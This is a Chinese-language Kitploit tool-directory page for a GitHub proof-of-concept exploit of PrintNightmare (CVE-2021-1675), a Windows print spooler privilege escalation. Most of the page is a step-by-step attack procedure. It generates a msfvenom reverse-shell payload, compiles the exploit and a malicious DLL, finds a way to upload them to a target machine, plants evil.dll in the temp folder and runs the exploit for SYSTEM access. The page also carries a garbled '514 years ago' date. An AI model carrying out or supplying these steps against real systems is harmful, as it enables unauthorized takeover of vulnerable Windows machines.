Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/andrewtrube/cve-2021-1675
权限提升漏洞利用框架漏洞利用渗透测试红队Payload 开发
GitHubandrewtrube/cve-2021-1675

CVE-2021-1675

本地权限提升漏洞利用程序,针对 CVE-2021-1675(PrintNightmare),通过安装恶意 DLL 在易受攻击的 Windows 系统上获取 SYSTEM 权限。

查看仓库
514年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PrintNightmare 本地权限提升 PoC

src/nightmare.cpp:利用 CVE-2021-1675 获取系统访问权限的源代码 通过安装恶意 dll src/payload-dll.cpp:在入口函数中包含恶意 shellcode 的 dll 源代码

!!仅允许在您拥有测试权限的服务器上使用

概述

CVE-2021-1675 是 Microsoft Windows 打印后台处理程序服务中的一个漏洞, 该漏洞允许攻击者绕过 SeLoadDriverPrivilege 检查。通过安装一个 调用 shellcode 或使用 Windows API 建立反向 shell 连接的恶意 DLL,可以利用此漏洞在目标机器上实现权限提升。2021 年 6 月 8 日之前的 Windows 10/8/Server 2008/Server 2012 版本均受影响。

POC

  1. 下载或克隆 git 仓库
  2. 使用 msfvenom 生成合适的 c 语言 payload $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. 将 msfvenom 的输出粘贴到 payload-dll.cpp 中标有“change me”的位置
  4. 编译主可执行文件 x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. 编译 dll x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. 将 exe 和 dll 打包成归档文件,然后想办法将归档文件上传到目标机器 zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. 归档文件上传到目标 Windows 机器后,将其解压
  8. 将 evil.dll 移动到 c:\windows\temp\evil.dll
  9. 运行 PrintNightmareLPE.exe

备注

  • 如果一切正常,该漏洞利用程序应遍历 Windows 打印机驱动程序并打印出结果
  • 您可以在源代码中更改 PrintNightmareLPE.exe 加载 evil.dll 的文件路径
  • 目前恶意 dll 仅加载 calc.exe 作为概念验证
下载工具